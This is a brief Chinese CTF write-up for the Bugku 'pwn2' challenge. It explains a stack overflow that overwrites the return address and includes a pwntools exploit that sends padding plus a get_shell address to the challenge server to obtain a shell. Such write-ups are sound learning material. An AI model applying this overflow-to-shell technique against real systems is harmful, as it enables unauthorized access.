[Bugku CTF——Pwn] pwn2 题目地址:https://ctf.bugku.com/ 额,好久不写这么简单的题目了 利用栈溢出修改返回地址就好, 如果不会就去看看什么是栈溢出 exploit from pwn import * p = remote('114.67.246.176',11431) get_shell = 0x0000000000400751 payload = 'a' * (0x30 + 8) + p64(get_shell) p.send(payload) p.interactive()